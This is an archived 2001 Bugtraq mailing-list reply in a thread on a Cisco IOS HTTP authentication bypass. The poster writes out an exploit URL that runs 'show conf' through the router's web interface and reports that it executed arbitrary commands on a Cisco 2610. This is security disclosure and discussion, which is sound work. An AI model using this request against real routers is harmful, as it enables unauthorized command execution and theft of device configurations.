Bugtraq mailing list archives

Re: Cisco device HTTP exploit...

From: Grzegorz Krawczyk <krawiec () saturn expro pl>
Date: Tue, 3 Jul 2001 09:14:06 +0200 (CEST)

A malicious user could use:

http://169.254.0.15/level/42/exec/show%20conf

I've tested it on CISCO 2610 router with
IOS (tm) C2600 Software (C2600-I-M), Version 12.0(10), RELEASE SOFTWARE
(fc1)
It work.. You can exec any command..

Krawiec

Current thread:

Cisco device HTTP exploit... Half Adder (Jul 02)
- Re: Cisco device HTTP exploit... Marc-Adrian Napoli (Jul 03)
  - Re: Cisco device HTTP exploit... Damir Rajnovic (Jul 04)
- Re: Cisco device HTTP exploit... Grzegorz Krawczyk (Jul 03)
- <Possible follow-ups>
- RE: Cisco device HTTP exploit... Thornton, Simon (Simon)** CTR ** (Jul 05)